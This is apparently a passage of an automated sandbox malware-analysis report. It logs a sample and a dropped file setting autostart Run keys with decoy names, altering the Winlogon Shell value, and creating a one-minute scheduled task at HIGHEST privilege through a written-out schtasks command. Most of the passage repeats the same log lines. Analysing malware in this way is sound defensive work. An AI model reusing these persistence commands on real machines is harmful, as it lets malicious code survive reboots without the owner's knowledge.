                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
                                    Creates multiple autostart registry keys
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ybWXCCKXKhIvlNpBF
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run portBrowserweb
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateJump to behavior
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                    Uses schtasks.exe or at.exe to add and modify task schedules
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\user\AppData\Roaming\Update.exe"
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UpdateJump to behavior
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run System
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ybWXCCKXKhIvlNpBF
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ybWXCCKXKhIvlNpBF
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WmiPrvSE
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Idle
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run portBrowserweb
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run portBrowserweb
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ybWXCCKXKhIvlNpBF
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ybWXCCKXKhIvlNpBF

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Loading BitLocker PowerShell Module
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
